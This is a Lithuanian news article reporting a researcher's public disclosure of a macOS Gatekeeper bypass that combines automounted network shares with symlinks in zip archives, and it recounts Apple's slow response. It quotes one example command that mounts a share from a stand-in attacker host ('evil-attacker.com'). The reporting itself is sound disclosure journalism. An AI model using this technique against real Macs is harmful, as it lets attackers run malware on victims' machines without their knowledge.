„Mac“ kompiuteryje lengva įdiegti kenkėjišką programą. „Apple“ klaidos neištaisė net po trijų mėnesių

27. 5. 2019

Saugumo tyrinėtojas Filippo Cavallarinas savo tinklaraštyje paskelbė įspėjimą apie „macOS 10.14.5“ klaidą. Tai apima galimybę visiškai apeiti Gatekeeper saugumo priemones. Anot Cavallarin, jis į klaidą „Apple“ nurodė jau šių metų vasarį, tačiau naujausiame atnaujinime įmonė jos nepataisė.

„Gatekeeper“ sukūrė „Apple“ ir 2012 m. pirmą kartą įtraukė į savo darbalaukio operacinę sistemą. Tai mechanizmas, neleidžiantis programai paleisti be vartotojo žinios ir sutikimo. Atsisiuntus programėlę, „Gatekeeper“ automatiškai patikrina jos kodą, kad patikrintų, ar programinė įranga tinkamai pasirašyta „Apple“.

Savo tinklaraščio įraše Cavallarin pažymi, kad „Gatekeeper“ pagal numatytuosius nustatymus laiko saugiomis vietomis ir išorinę saugyklą, ir tinklo dalis. Todėl bet kuri šiuose taikiniuose esanti programa gali būti automatiškai paleista, neatliekant „Gatekeeper“ patikros. Būtent šia funkcija galima paleisti kenkėjišką programinę įrangą be vartotojo žinios.

Vienas aspektas, leidžiantis neteisėtai pasiekti, yra automatinio prijungimo funkcija, leidžianti vartotojams automatiškai prijungti tinklo dalį tiesiog nurodant kelią, prasidedantį raide „/net/“. Kaip pavyzdį Cavallarin nurodo kelią „ls /net/evil-attacker.com/sharedfolder/“, dėl kurio operacinė sistema gali įkelti „sharefolder“ aplanko turinį atokioje vietoje, o tai gali būti potencialiai kenkėjiška.

Vaizdo įraše galite pamatyti, kaip veikia grėsmė:

Kitas veiksnys yra tai, kad jei bendrai naudojamas zip archyvas, kuriame yra konkreti nuoroda, vedanti į automatinio prijungimo funkciją, Gatekeeper jo nepatikrins. Tokiu būdu auka gali lengvai atsisiųsti kenkėjišką archyvą ir jį išpakuoti, todėl užpuolikas gali paleisti praktiškai bet kokią programinę įrangą „Mac“ kompiuteryje be vartotojo žinios. „Finder“, kuris pagal numatytuosius nustatymus paslepia tam tikrus plėtinius, taip pat turi savo dalį šio pažeidžiamumo.

Cavallarinas savo tinklaraštyje teigia, kad „Apple“ atkreipė dėmesį į „macOS“ operacinės sistemos pažeidžiamumą šių metų vasario 22 d. Tačiau gegužės viduryje „Apple“ nustojo bendrauti su „Cavallarin“, todėl „Cavallarin“ nusprendė visa tai paviešinti.

Šaltinis: FCVL

Temos: saugykla, automatinis, MacOS, video, Nustatymai, funkcija, Vartotojas, aplikace, Apple

Straipsnio aptarimas

Vaše Jméno

Tavo komentaras

Pildydamas aukščiau nurodytus duomenis, patvirtinu, kad įmonė TEXT FACTORY s.r.o., registruota buveinė Brno, Durďákova 336/29, Černá Pole, pašto kodas: 613 00, ID numeris: 06157831, registruota Brno apygardos teisme, C skyriuje , įrašyti 100399, tvarkys mano asmens duomenis, pateiktus mano užpildytoje registracijos formoje, remdamasi teisėtais TEXT FACTORY s.r.o. interesais pagal 6 straipsnio 1 dalies raštą. f) BDAR ir vykdyti teisinius įsipareigojimus (BDAR 6 straipsnio 1 dalies c punktas), šiais tikslais: būtinybei užtikrinti TEXT FACTORY s.r.o. valdomų svetainių lankytojų leidimą aktyviai prisidėti prie publikuojamų straipsnių ar diskusijų. forumuose ir naudojantis TEXT FACTORY s.r.o., kaip šių diskusijų forumų administratoriaus, teisėmis. Daugiau informacijos apie asmens duomenų tvarkymą ir teises rasite Asmens duomenų apsaugos pamokos. visą tekstą

Tai gali būti jus domina

Susijęs